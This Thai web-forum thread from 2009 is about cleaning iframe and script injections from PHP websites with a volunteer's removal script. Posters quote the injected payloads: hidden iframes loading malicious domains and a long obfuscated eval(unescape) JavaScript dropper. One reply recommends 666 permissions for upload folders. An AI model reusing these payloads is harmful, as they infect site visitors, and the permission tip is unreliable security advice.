ขอบคุณคุณโจ้มาก ๆ ครับ  เว็บผมเยอะ ได้ัตัวนี้ช่วยแจ่มสุด ๆ เจอกันสักวันจะเลี้ยงข้าวให้กลิ้งกลับบ้านเลย อิอิ

ผมอัพเดตเพิ่มนะครับ ตาม PM จากคุณ reset
ผมจะบอกว่าใครถามมาเป็นระยะ เพราะถือว่าช่วยในการ research
หลายท่านที่เคยถามทาง PM มา ก็ช่วยให้ความร่วมมือในการเข้าถึง FTP
เพราะมันง่ายที่จะตรวจสอบจากไฟล์ตรงๆ และอีกอย่าง
ปกติอย่างผมเอง ก็มักไม่อยากให้คนอื่นเข้าถึง FTP
ประมาณว่าถ้าไม่กล้าพอ คงไม่กล้าให้คนอื่นเข้าถึง FTP

กลับมาเรื่องการอัพเดต มีการอัพเดตใหม่ที่โค้ดส่วน iframe
ให้จัดการมันทุก iframe ที่เข้าข่าย เป็น iframe ของเว็บอื่นและโดนซ่อนด้วย css ให้แสดงไม่เห็น
คิดว่าต่อไปน่าจะจัดการได้หมดครับ แต่ทุกอย่างล้วนมีจุดอ่อนเหมือนกัน

ช่วงนี้ปั่นงานยุ่งๆ นี้ก็เพิ่งซื้อเทมเพลตจาก themeforest มายำเว็บลูกค้าเพิ่ม
ผมไม่ได้จะโฆษณา ref ที่อยู่ที่ลายเซ็นนะ ที่ติดก็หวังผลพลอยได้ (ฮา)
แต่จริงๆ สนับสนุนให้ใช้เทมเพลตถูกลิขสิทธิ์หน่อย เพราะเวลามานั่งออกแบบเอง
ถึงรู้ว่ามันยากแฮะ ยอมเสียสัก 300 กว่าบาท แล้วได้เทมสวย อาจมีใช้ซ้ำไม่กี่คน
แต่ผมว่าคุ้ม และสบายใจ

กลับเข้าเรื่องอีกนิด ใครอยากส่งเว็บที่มีปัญหามาถาม ก็ส่งมาเลยนะครับ
แต่อาจตอบกลับช้าหน่อย ก็อย่าว่ากันนะ 

แล้วถ้าคิดว่าแก้ปัญหาเองไม่ได้ ก็รบกวนส่ง FTP มาด้วย เพราะต้องดูที่โค้ดบนโฮสจริงๆ
ยังไงแนะนำให้เปลี่ยนพาส ftp ก่อน เพราะมีบางท่านส่ง pass ใช้ปัจจุบันมาให้มั้ง
ถึงแม้เป็นผม ก็อย่าไว้ใจเป็นดีสุดครับ

ส่วนใครรู้ว่าเกิดจากจุดไหนของไฟล์ ก็ส่งข้อมูลมาแนะนำได้เลยครับ
ให้แนะนำมาผมก็ให้เครดิตหมด ถ้าตกหล่นก็ทวงมาได้เลย
ถือว่าช่วยกันเพราะยังไงก็ยังมีเว็บมาสเตอร์หลายท่านที่ไม่เก่ง php
มันเลยเป็นจุดอ่อนให้พวกนี้ มันแทรกโค้ดเอาซะคนอื่นไม่เห็น



ส่วนผมไปทำงานต่อ เชื่อไหม ผมดองงานมาครึ่งปี คือมันไม่เสร็จซักกะที
โชคดีว่าเป็นงานของญาติ เขาไม่ว่าอะไร แต่ถามมาทีไร ผมจี๊ดในหัวใจทุกที

เพิ่งโดนเมื่อกี้ใช้ v1.3 โจ้ มันไม่สิ้นซาก
ตอนนี้แก้ด้วยมือไปแล้ว และsave V2.5 ไว้แล้ว

ถ้าใช้คิปลบมันมักไปลบ

}

?>

ทำให้สคริป <?PHP มันจบไม่ได้เว็บพังหมดเลย 

อ้างถึงจาก: Step9 ใน 22 พฤษภาคม 2009, 13:05:59
เพิ่งโดนเมื่อกี้ใช้ v1.3 โจ้ มันไม่สิ้นซาก
ตอนนี้แก้ด้วยมือไปแล้ว และsave V2.5 ไว้แล้ว

ถ้าใช้คิปลบมันมักไปลบ

}

?>

ทำให้สคริป <?PHP มันจบไม่ได้เว็บพังหมดเลย 

สคริปผมมันลบ
}

?>

ไปด้วยเหรอครับ ?

งงแฮะว่ามันเอาส่วนไหนไปลบ

ไว้โดนใหม่จะจับไฟล์ต้นฉบับ1
ไฟล์ที่โดน iframe1

เทียบอีกทีว่ามันแทรกยังไงของมัน

พอดีเจอปุ๊ปRunสคริปโจ้ เลย พอเข้าไปดูไฟล์มันแหว่ง  
บางทีiframeมันอาจเนียนมาใช้ codeดังกล่าวร่วมกัน (ไหมนี่)




---
code iframe

echo "<iframe src=\"http://clifedo.net/?click=B9EB75\" width=1 height=1 style=\"visibility:hidden;positio
<iframe src="http://greatnamemovie.cn:8080/ts/in.cgi?pepsi18" width=12 height=12 style="visibility: hidden"></iframe>

ดูดู๊ดู ทำแฮดทริกในไฟล์เดียว  

echo "<iframe src=\"http://clifedo.net/?click=BDC53C\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



echo "<iframe src=\"http://internetcountercheck.com/?click=17126421\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";



echo "<iframe src=\"http://vafuiek.com/?click=15FCB05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

อยากรู้จังคนเขียนสคริปท์ iframe จิตใจทำด้วยอะไร ทำไม โหดขนาดนี้

ขอบคุณ คุณ โจ้ มากครับ
เจ้า iframe ตัวนี้เล่นผม มึนไปเลย ล้างแล้วล้างอีก

ครั้งนี้คงจะลาขาดกับ มันได้แล้ว นะ



ปล.กำลังไล่สแกน อยุ่ครับ

อ้างถึงจาก: Step9 ใน 22 พฤษภาคม 2009, 13:32:00
พอดีเจอปุ๊ปRunสคริปโจ้ เลย พอเข้าไปดูไฟล์มันแหว่ง  
บางทีiframeมันอาจเนียนมาใช้ codeดังกล่าวร่วมกัน (ไหมนี่)

คือโค้ดที่ผมเขียน มันจะลบแก้ไข ก็อ้างอิงจาก regex ที่มี
ซึ่งไม่มีตัวไหนเลยที่มันจะไปลบตัวนั้น

อีกอย่าง ต่อให้เป็นเรื่องความผิดพลาดของการเขียนไฟล์ ซึ่งโอกาสมัน 0.00000001
ก็จะอยู่ในรูปไฟล์เปล่า (ไม่มีสักอักษร) หรือ ไฟล์หาย

อ้างถึงจาก: pling ใน 23 พฤษภาคม 2009, 16:32:09
โอยโดนเวปทั้งหมดใน host hm เลยครับ ลองรันคิปโจ้แล้วมันก็นิ่งไปเลยมันจะ checking เวปไปเรื่อยๆแล้วจะหยุดครับ ไม่ทราบว่าต้องทำอย่างไรต่อดีครับ

บอกตามตรงว่าทำใจจริงๆ เพราะแสดงว่ามันเยอะจัด ต้องรันแยกทีละโดเมนละครับ
เพราะผมเขียนให้มันซอยในการตรวจโฟลเดอร์ด้วย ajax ขนาดนี้แล้ว
ถ้ายังมีสภาพแบบนี้ แปลว่ามันเกินที่ php จะตรวจไหว

ผมโดนฝังสคริปต์นี้ครับ

<script>var ABwRxE="X2H61X2H";var EInecw9n="A9g64%BRA";var ICAIcP="X2H3DX2H6";var mTwhvHE="e(/oun/";var BZpAD="74%BRA9g6";var pIXcLl2S="2H67X2H";var Sqf8="02U6D02U6502U3";var oiiv4D="%BRA9g68%BRA9g";var wHAJ="9g79%BRA9g4Do";var L5a1DG="A9g29ounB';e";wHAJ="%BRA9g4D%BRA"+wHAJ;var HADxBu="='%BRA9g64%BRA9";var ooHKQVq="7%BRA9g";var G4C9dD="6Y4D6Y7R";var sNgYKY="%BRA9g6D%BRA";var HSiqRp="H22X2H3BX2H69";var kctKYuGO="nD%BRA9g64%BRA";var PfV7pN0b="EX2H62";ooHKQVq="1%BRA9g6"+ooHKQVq;var IgD5="(Rb55.r";var rH3a="A9g6E%BRA9g74%";var eMBZEbyJ="D02U3c7";var w7KJZG7A=".replace(/c/g,";var Q5FYCN="69X2H76X2H20X2H";var yLhhco="2U7502U6202";var qb7U4t="X2H27X2H";var aw9Hj="E%BRA9g74%BRA9";var hj6I="1X2H67X2H7";var RLrUASt="4D6Y7R6";var B8DERO6="'%')));";var RppFihTv="A9g66%";var nbrr="%BRA9g72%BRA9g2";var z0iVgyc=");var R";var bFqJzREV="2H%Lb7X2H68X2";Q5FYCN+="69X2HWL";var EykK="U2702U3B';";nbrr="BRA9g61"+nbrr;var nWhnNJ="H3CX2H2FX2HWL";var RViE="E%BRA9g74%BRA9";var BAiVh3IE="g64%BRA9g";var Ahiv="H3CX2H62";var jUKZFWM="2702U3102U2";var HyiVNImo="g65%BRA";var KCUev="902U4D02U3c";var mw0szU="RA9g65%";hj6I="2X2H20X2H7"+hj6I;var W03BBU="2U2702U6c7";Ahiv="bX2H3DX2H27X2"+Ahiv;ooHKQVq+="79oun6%BRA9";mTwhvHE="').replac"+mTwhvHE;oiiv4D+="27%BRA9g29o";oiiv4D+="unB%BR";HyiVNImo+="9g6D%BRA9g65%";var xQgtmCM="X2H22X";var uueXRl="Y6R6Y746Y7R6Y";var b21QUBg="2U2E02U770";var FqyaNKF1="(/%Lb/";PfV7pN0b="2H6EX2H7%LbX2H2"+PfV7pN0b;RViE=HyiVNImo+"BRA9g6"+RViE;var FH2jWr="6Y686Y6R6Y646Y6";var SiWXj="02U2F02";var DmQVS5="2F02U4";var GrnG="eplace(/RA9/g";var WPd3ypyX="U4402U7902U";Ahiv+="X2H6FX2HWLb";var VcpyI="U5402U4902";var p7zMFDBB="7202U6";aw9Hj+="g2E%BRA9g77%BR";z0iVgyc=mTwhvHE+"g,'%3'))"+z0iVgyc;EykK="2U7002U4402"+EykK;var VqIu3j8="BRA9g6";var Giu5="02U3102U2702U3";qb7U4t+="3B';eval(une";var h8zoe="28X2HWLbX2H";var jgsFTb7="9g6E%BRA9g74%BR";mw0szU="g63%BRA9g72%B"+mw0szU;Q5FYCN=xQgtmCM+"2H3CX2HWLbX2H"+Q5FYCN;L5a1DG="g27%BR"+L5a1DG;var PMGa="02U3602U4F02";b21QUBg="U3602U4F0"+b21QUBg;var NYaSFEVL="ypM='X2H76X2H";var YrSkVOD="U6C02U27";rH3a+="BRA9g2";ICAIcP="9X2H3D"+ICAIcP;var EYbQiNB="R6Y626Y";var wu8EK="61%BRA9g72";var Xr15J="BRA9g7";var FLCJ43="g61%BRA9g4";KCUev+="7902U6F02U3";B8DERO6="eplace(/6Y/g,"+B8DERO6;wHAJ=wu8EK+"%BRA9g20"+wHAJ;var rqiAczo="CHAPL.repla";RLrUASt="Y6C6Y646Y286Y"+RLrUASt;IgD5+="eplace(/02U/";ooHKQVq="g28%BRA9g7"+ooHKQVq;L5a1DG+="val(une";RppFihTv="RA9g69%BR"+RppFihTv;L5a1DG="65%BRA9"+L5a1DG;qb7U4t+="scape(";Xr15J="RA9g63%"+Xr15J;KCUev=jUKZFWM+"702U3B02U4D02U7"+KCUev;GrnG+=",'q').repla";z0iVgyc=GrnG+"ce(/%Bqg/g,'%"+z0iVgyc;eMBZEbyJ=Giu5+"B02U4D02U7902U4"+eMBZEbyJ;var j0Nq="g65%BRA9g74%B";var JVVX="16Y706Y706Y656Y";FH2jWr+="46Y656Y6E";nWhnNJ+="bX2H69X2H7";oiiv4D="%BRA9g68"+oiiv4D;h8zoe=HSiqRp+"X2H66X2H"+h8zoe;VqIu3j8="63%BRA9g75%"+VqIu3j8;var GZl2lgtB="BRA9g2E%BR";var ucTY2To9="A9g61%BRA9";var hCdrz8z="7902U4D02U";var KShw="FX2H62X2H6FX2";YrSkVOD="02U4D02U6102"+YrSkVOD;var D3XN="c6502U6";jgsFTb7+="A9g42%BRA9g79%";qb7U4t=KShw+"HWLbX2H79X2H3E"+qb7U4t;var pRBrw="A9g62%BRA9";var PbFZj="2U6202U6102U720";D3XN=KCUev+"602U4F02U2E02U6"+D3XN;G4C9dD+="6Y4D6Y386Y7R6Y6";Xr15J+="5%BRA9g6D";ooHKQVq="0%BRA9"+ooHKQVq;var fKVTCoT="6Y646Y7R6Y4D6Y";rH3a=Xr15J+"%BRA9g65%BR"+rH3a;var MnnlnK1="2U6202";EYbQiNB="R6Y736Y6"+EYbQiNB;Sqf8="6E02U61"+Sqf8;var pZ1qdI="%BRA9g6C%";PMGa=hCdrz8z+"3c7902U6F"+PMGa;mw0szU=rH3a+"E%BRA9"+mw0szU;Ahiv+="X2H79X2H3EX2H2";FqyaNKF1="replace"+FqyaNKF1;YrSkVOD=DmQVS5+"602U72"+YrSkVOD;RViE="5%BRA9g6C%BRA9"+RViE;PbFZj=MnnlnK1+"U6C02U650"+PbFZj;kctKYuGO+="9g6F%BRA9g63";ooHKQVq="%BRA9g65%BRA9g2"+ooHKQVq;B8DERO6=rqiAczo+"ce(/R/g,'9').r"+B8DERO6;WPd3ypyX=Sqf8+"D02U2702"+WPd3ypyX;var LGFh="g,'%')));var";FLCJ43=BAiVh3IE+"28%BRA9g27%BRA9"+FLCJ43;var mTR9Uy="02U6402U2E02U77";W03BBU+="402U7402U";mw0szU=EInecw9n+"9g6F%B"+mw0szU;Ahiv=pIXcLl2S+"79X2H36X2H5%L"+Ahiv;FLCJ43=jgsFTb7+"BRA9g49%BRA9"+FLCJ43;ooHKQVq="9%BRA9g74"+ooHKQVq;NYaSFEVL="var yUB6"+NYaSFEVL;wHAJ=oiiv4D+"A9g76%BRA9g"+wHAJ;FH2jWr=uueXRl+"3D6Y27"+FH2jWr;var tVePz="Y4F6Y2E6Y736Y7";BZpAD=mw0szU+"BRA9g61%BRA9g"+BZpAD;tVePz+="46Y7R6Y6C6Y656Y";b21QUBg+="2U6902U6402U740";tVePz=G4C9dD+"F6Y366"+tVePz;Q5FYCN="H5%LbX2H3D"+Q5FYCN;JVVX+="6E6Y646Y436Y";var qnEYR0="366Y4F6Y2R6Y3";qnEYR0="6Y6F6Y"+qnEYR0;ICAIcP+="EX2H75X2H6CX2";p7zMFDBB=PMGa+"U2E02U7302U"+p7zMFDBB;D3XN=b21QUBg+"2U6c3D02U"+D3XN;RViE=BZpAD+"5%BRA9g4"+RViE;wHAJ+="un8%BRA9g79%BR";WPd3ypyX="4F02U2E02U"+WPd3ypyX;VqIu3j8=HADxBu+"g6F%BRA9g"+VqIu3j8;nbrr="29ounB%BRA9g76%"+nbrr;w7KJZG7A=IgD5+"g,'%')"+w7KJZG7A;kctKYuGO="%BRA9g4Doun6ou"+kctKYuGO;RppFihTv=RViE+"g28%BRA9g27%B"+RppFihTv;EYbQiNB=tVePz+"2E6Y766Y6"+EYbQiNB;qb7U4t+="yUB6ypM.repl";JVVX=fKVTCoT+"366Y2E6Y6"+JVVX;L5a1DG=ucTY2To9+"g6D%BRA9g"+L5a1DG;WPd3ypyX=eMBZEbyJ+"902U6F02U3602U"+WPd3ypyX;GZl2lgtB="RA9g6E%BRA9g74%"+GZl2lgtB;VcpyI=WPd3ypyX+"3902U6F02"+VcpyI;ICAIcP=PfV7pN0b+"X2H6FX2HWLbX2H7"+ICAIcP;L5a1DG=RppFihTv+"BRA9g72%BR"+L5a1DG;var xRVOH="2U2E02U6202U6F";pZ1qdI+="BRA9g65%BRA9g";ooHKQVq=aw9Hj+"A9g72%BRA9g6"+ooHKQVq;FH2jWr+="6Y276Y3";mTR9Uy="C02U65"+mTR9Uy;var ODHMv="2H79X2H36X2H";L5a1DG="9g4FounD%BR"+L5a1DG;qnEYR0+="B';eval(un";pZ1qdI=j0Nq+"RA9g45"+pZ1qdI;VcpyI="U6c7402U3D02U27"+VcpyI;var hHDNuiX="02U4D02U";RLrUASt=JVVX+"686Y6R6"+RLrUASt;L5a1DG+="scape(zY";B8DERO6=qnEYR0+"escape(LP"+B8DERO6;qb7U4t="2H3CX2H2"+qb7U4t;qb7U4t=ODHMv+"5%LbX2H2BX2H27X"+qb7U4t;p7zMFDBB=z0iVgyc+"b55='02U4D02U"+p7zMFDBB;D3XN=hHDNuiX+"3c7902U6F02"+D3XN;ooHKQVq="g65%BRA9g6"+ooHKQVq;W03BBU=p7zMFDBB+"302U3D0"+W03BBU;VqIu3j8=LGFh+" zYW2UKe8"+VqIu3j8;wHAJ=FLCJ43+"Coun7%BRA9g47"+wHAJ;mTR9Uy=PbFZj+"2U6502U6C02U6"+mTR9Uy;VcpyI=D3XN+"902U6702"+VcpyI;B8DERO6=RLrUASt+"Y4D6Y386Y7R"+B8DERO6;EykK=VcpyI+"U3502U390"+EykK;FH2jWr=EYbQiNB+"6R6Y6C6"+FH2jWr;pRBrw=nbrr+"0%BRA9g47%BR"+pRBrw;Ahiv=ICAIcP+"H6CX2H29X2H71X"+Ahiv;h8zoe=nWhnNJ+"6X2H3EX2"+h8zoe;pRBrw=ooHKQVq+"g54%BRA9g"+pRBrw;qb7U4t="2H71X2H67X"+qb7U4t;wHAJ=pZ1qdI+"6D%BRA9g65%BRA"+wHAJ;h8zoe="2H3EX2"+h8zoe;ABwRxE=Q5FYCN+"bX2H3DX2H27"+ABwRxE;bFqJzREV=ABwRxE+"%LbCX2H37X"+bFqJzREV;L5a1DG=wHAJ+"A9g6Foun6%BRA"+L5a1DG;w7KJZG7A=EykK+"eval(unescape"+w7KJZG7A;SiWXj=W03BBU+"7002U3A02U2F"+SiWXj;hj6I=NYaSFEVL+"61X2H7"+hj6I;mTR9Uy=xRVOH+"02U750"+mTR9Uy;mTR9Uy=yLhhco+"U6C02U650"+mTR9Uy;qb7U4t=Ahiv+"7X2H2BX"+qb7U4t;VqIu3j8="eplace(/X2H/"+VqIu3j8;FqyaNKF1=qb7U4t+"ace(/W/g,'6%')."+FqyaNKF1;h8zoe=bFqJzREV+"H68X2H27X"+h8zoe;w7KJZG7A=YrSkVOD+"02U3B02U4D02U79"+w7KJZG7A;FqyaNKF1="5X2H6DX2H65X"+FqyaNKF1;kctKYuGO=pRBrw+"g64%BRA9g79"+kctKYuGO;SiWXj=L5a1DG+"W2UKe8.r"+SiWXj;h8zoe=hj6I+"9X2H36X2"+h8zoe;FqyaNKF1=h8zoe+"6FX2H63X2H7"+FqyaNKF1;FH2jWr="var LPCHAPL='"+FH2jWr;mTR9Uy=SiWXj+"U6402U6F0"+mTR9Uy;mTR9Uy=GZl2lgtB+"A9g67%BRA9"+mTR9Uy;mTR9Uy=sNgYKY+"9g65%B"+mTR9Uy;FH2jWr=w7KJZG7A+"'8%')));"+FH2jWr;FH2jWr=mTR9Uy+"02U7302U"+FH2jWr;kctKYuGO=VqIu3j8+"D%BRA9"+kctKYuGO;FH2jWr=kctKYuGO+"%BRA9g75"+FH2jWr;B8DERO6=FH2jWr+"B6Y476Y62"+B8DERO6;B8DERO6=FqyaNKF1+"g,'4').r"+B8DERO6;eval(B8DERO6);</script>

ลองใช้สแกนแล้ว  มันไม่หายอ่ะครับ 

เวอร์ชั่น 2.6 นี่ ดาวน์โหลดจากที่ไหนครับ
ผมโหลดจากหนาแรกมาเป็น 2.5

ผมรันแล้วขึ้นแบบนี้

PHP Virus Remover AJAX - v2.5

โปรแกรมนี้จะทำงานทั้งหมด 2 ขั้นตอน
1. ตรวจหาไฟล์ที่มีปัญหา
2. จัดการแก้ไขไฟล์เหล่านั้น

Idle....

Run File Extension Checker...
Checking: /...
Checking: /wpau-backup/...
Checking: /wp-content/...
Checking: /wp-includes/...
Checking: /cgi-bin/...
Checking: /wp-admin/...
Checking: /wp-content/upgrade/...
Checking: /wp-content/themes/...
Checking: /wp-content/uploads/...
Checking: /wp-content/plugins/...

อันนี้แสดงว่า ตรวจแล้วไม่เจอใช่หรือไม่ครับ
หรือว่า มันกำลังหายังไม่เสร็จ

ขอบคุณครับ

หนักเหมือนกัน ลบไม่หมด ชักเหนื่อย

ในที่สุดก็ intrend กะเค้า  ควรดีใจใช่ม้ายยย 





Google ขึ้นเตือนว่า  "Malicious software includes 28 exploit(s)"
มันหมายถึงโดนไป 28 ไฟล์รึเปล่าอ่ะ 
แต่ว่า ลองใช้สคริปของน้องโจ้แล้ว มันลบไป 3 อัน



ซึ่งจากชื่อที่ Google ระบุมา ไม่มี gumblar.cn เหมือนของน้องกิว
แต่ว่าสคริปน้องโจ้ลบได้ แปลว่าโจ้ได้อัพเดทเว็บอื่นๆ เข้าไปด้วยแล้วหรอคะ?


เรื่องสุดท้าย คงต้องรบกวนน้องโจ้เข้าไปดูที่ FTP ให้หน่อยนะคะ  เพราะพี่เดาว่าสคริปน่าจะยังลบออกไม่หมด  (เพราะพี่หาเองม่ายยยเจอออ  )
และจะได้เอาชื่อเว็บ ชื่อไวรัส มาอัพเดทสคริปกัน ป้องกันคนอื่นๆ โดนด้วย 


ขอบคุณมากมายสำหรับสคริป และ ความช่วยเหลืออ่ะ 

@mapandy เดี๋ยวจะปรับปรุงให้ครับ (คงพรุ่งนี้นะ)

@pling โหลดเวอร์ชั่นที่ใช้กับ Cpanel ไปใช้แทนครับ

@Finish เป็นความผิดพลาดผมเองครับ ลืมแก้เลขเวอร์ชั่นในตัวไฟล์
แต่ให้สังเกตหัวไฟล์ครับ ตรงนี้ไม่ลืม ^^"
ส่วนที่ขึ้น Checking คือมันกำลังตรวจหาไฟล์ที่เป็นนามสกุลที่ควรตรวจ
"php", "css", "tpl", "js", "html", "htm", "txt", "php3", "inc"
พอหาไฟล์พวกนี้ครบ มันจะเก็บเป้นลิส แล้วถึงเข้าขั้นตอนสอง
ในการไล่ตรวจทีละไฟล์ และจัดการลบครับ 

@sssii งานนี้ต้องดูแลเครื่องเราก่อน แล้วเว็บเราก็จะปลอดภัยตามครับ

@sealinda regex บางตัวผมเขียนยืดหยุนครับ มันเลยลบของตัวอื่นได้
เขียนบนแนวคิดความสงสัยว่าถ้ามีการเข้ารหัส ก็แปลว่ามีความเสี่ยง
จะไปแค่ eval base64 ปกติที่ผมไม่ได้เขียนสั่งลบ เพราะเทมเพลต WP บางรายมีเข้ารหัสมา เผลอลบก็มีอันเทมพัง
ส่วน FTP ก็ส่งข้อมูลมาทาง PM นะครับ จะได้ตรวจให้

======================
ช่วงนี้ผมไม่มีเวลามาให้ตรงนี้ต้องขอโทษทีครับ (เข้ามาก็ไม่รู้ด้วยแหละว่ากระทู้มีคนโพส)
ตอนนี้เคลียร์งานดองค้างให้หมด ทุกวันนี้ยังไม่รับงานใดๆ เพิ่มเลย



ปล. ใครใช้สคริปแล้วเว็บมีปัญหาเว็บเสีย ต้องแจ้งผมนะครับ ทาง PM เลย
กังวลเรื่องนี้มากๆ เหมือนกัน 

ขอบคุณน้องโจ้มากๆๆๆๆๆค่ะ 



อันนี้นอกเรื่องนิดหน่อยนะ
เห็น reply ก่อนหน้านี้ มีพูดถึงโฮสต์กัน......ว่าถ้าติดเว็บนึง มีความเป็นไปได้ว่าจะติดทั้งโฮสต์
ของพี่เอใช้ hostmonster เนี่ย ก็มีความเป็นไปได้ว่าคนอื่นๆ ที่ใช้ hostmonster ก็จะติดเหมือนกันใช่ไหม 


แต่คุยกะทาง support เค้าบอกว่าเค้าไม่มีการ maintenance เรื่องไวรัสให้
เค้าบอกว่า จะทำการ rollback กลับไป database ที่อัพเดทล่าสุดให้อย่างเดียว แต่จะไม่หาให้ว่าไวรัส หรือ ปัญหามันเกิดจากตรงไหน หรือต้องแก้ยังงัย    ก็เลยแอบแปลกใจว่าเค้าไม่กลัว มันจะแพร่กระจายไปที่เว็บอื่นๆ ในโฮสต์เค้าเลยหรอเนี่ย 


ยังงัยก้อระวังกันหน่อยนะคะ คอยตรวจเช็คเว็บดีๆละกัน เด๋วจะได้มา intrend ด้วยกัน 

อ้างถึงจาก: sealinda ใน 31 พฤษภาคม 2009, 01:38:43
ขอบคุณน้องโจ้มากๆๆๆๆๆค่ะ 



อันนี้นอกเรื่องนิดหน่อยนะ
เห็น reply ก่อนหน้านี้ มีพูดถึงโฮสต์กัน......ว่าถ้าติดเว็บนึง มีความเป็นไปได้ว่าจะติดทั้งโฮสต์
ของพี่เอใช้ hostmonster เนี่ย ก็มีความเป็นไปได้ว่าคนอื่นๆ ที่ใช้ hostmonster ก็จะติดเหมือนกันใช่ไหม 


แต่คุยกะทาง support เค้าบอกว่าเค้าไม่มีการ maintenance เรื่องไวรัสให้
เค้าบอกว่า จะทำการ rollback กลับไป database ที่อัพเดทล่าสุดให้อย่างเดียว แต่จะไม่หาให้ว่าไวรัส หรือ ปัญหามันเกิดจากตรงไหน หรือต้องแก้ยังงัย    ก็เลยแอบแปลกใจว่าเค้าไม่กลัว มันจะแพร่กระจายไปที่เว็บอื่นๆ ในโฮสต์เค้าเลยหรอเนี่ย 


ยังงัยก้อระวังกันหน่อยนะคะ คอยตรวจเช็คเว็บดีๆละกัน เด๋วจะได้มา intrend ด้วยกัน 

เรื่องนี้ต้องขอบคุณระบบโฮสที่ไม่ใช่ windows ครับ
ถ้าเราเซ็ต permission ดีๆ  อย่างโฟลเดอร์คือ 755 ไฟล์ก็ 644
ถ้าเซ็ตตามนี้ apache มันจะรันได้แต่แก้ไฟล์ไม่ได้

ก็จะทำให้เวลาแฮกเกอร์สั่งรัน php เพื่อแทรกโค้ดลงเว็บ
มันจะไม่โดนของคนอื่นบนโฮสด้วยครับ

แต่ถ้าเช่นไฟล์ตั้ง 666 อันนี้เจอคนไหนรันมา ก็โดนหมด

ดังนั้นวิธีเซฟสุดในการป้องกันการโดนลูกหลงจากคนอื่น คือ "โฟลเดอร์คือ 755 ไฟล์ก็ 644"
จำให้ขึ้นใจเลยครับ 

ส่วนกรณีเราโดนซะเอง อันนี้ต้องตรวจสอบพฤติกรรมการใช้คอม
เพราะไวรัสมันจะติดจากเครื่องเราก่อน แล้วแฮกเกอร์มันจะดัก ftp เราไปได้
แล้วมันถึงเข้า ftp ไปรัน php เพื่อแทรกโค้ดลงเว็บเราอีกทีครับ

อ้างถึงจาก: pling ใน 31 พฤษภาคม 2009, 11:52:25

อ้างถึง
ดังนั้นวิธีเซฟสุดในการป้องกันการโดนลูกหลงจากคนอื่น คือ "โฟลเดอร์คือ 755 ไฟล์ก็ 644"

ที่ folder  domain เลยป่าวคับโจ้
หรือที่
/pub_html เลย

แล้วก็ folder ย่อยข้างในมันอีกทีเป็นอะไรครับ

รอฟังด้วย 
ขอบคุณมากๆๆๆๆๆเลยนะคะ 

ทุกไฟล์644 + ทุกโฟลเดอร์755 เลย ปลอดภัยมากกว่า 95% (ทำอยู่ ตั้งกะโดนเล่นไปรอบนึง)

ยังไม่โดนอีกเลย

มันมาแล้วครับพี่น้อง เพิ่งเชคเว็บเจอ ล่อไปทั้งโฮสแลย
กำลังไล่เก็บอยู่ครับ จะแก้ได้หรือเปล่าน้อ เดี๋ยวมาอัปเดทครับ




น่ากลัวจริงๆ
เซงจริงๆ



ขอบคุณคุณโจ้มากครับ

อ้างถึงจาก: pling ใน 31 พฤษภาคม 2009, 21:28:28

อ้างถึงจาก: g-ji ใน 31 พฤษภาคม 2009, 20:48:10
ทุกไฟล์644 + ทุกโฟลเดอร์755 เลย ปลอดภัยมากกว่า 95% (ทำอยู่ ตั้งกะโดนเล่นไปรอบนึง)

ยังไม่โดนอีกเลย

อย่าง joomla เนี่ย มันจะมี folder ย่อย ภายใน folder ย่อยเยอะมาก
สรุป ทุก folder อยู่ตรงไหนไม่เกี่ยว ขอให้เป็น folder ให้เป็น 755
และ ทุก file อยู่ตรงไหนไม่เกี่ยว ขอให้เป็น 644
แบบนี้เข้าใจถูกต้องมั้ยครับ

ประมาณนั้นแหละนะ

อันไหนไม่ค่อยได้ใช้อ่ะ 644 กับ 755 ไปยาวๆ %ความปลอดภัยจะมีมากขึ้น

พวกโฟลเดอร์ที่เอาไว้อัพโหลดไฟล์ หรือ มีการใช้งานบ่อยๆ 666 ไว้ก็ได้

อ่า เกเตอร์ของผมเขาก็เซทเป็น 755 กับ 644 ออโตอยู่แล้ว แต่ดันติดทั้งยวงเลย  ตอนนี้สคริปแก้ไวรัสยังรันไม่เสร็จเลยครับ ตั้งแต่เที่ยงคืน ยันสว่าง แบบนี้ผิดปกติหรือเปล่าครับ สแกนไฟล์เห็นแค่ 2004ไฟล์เอง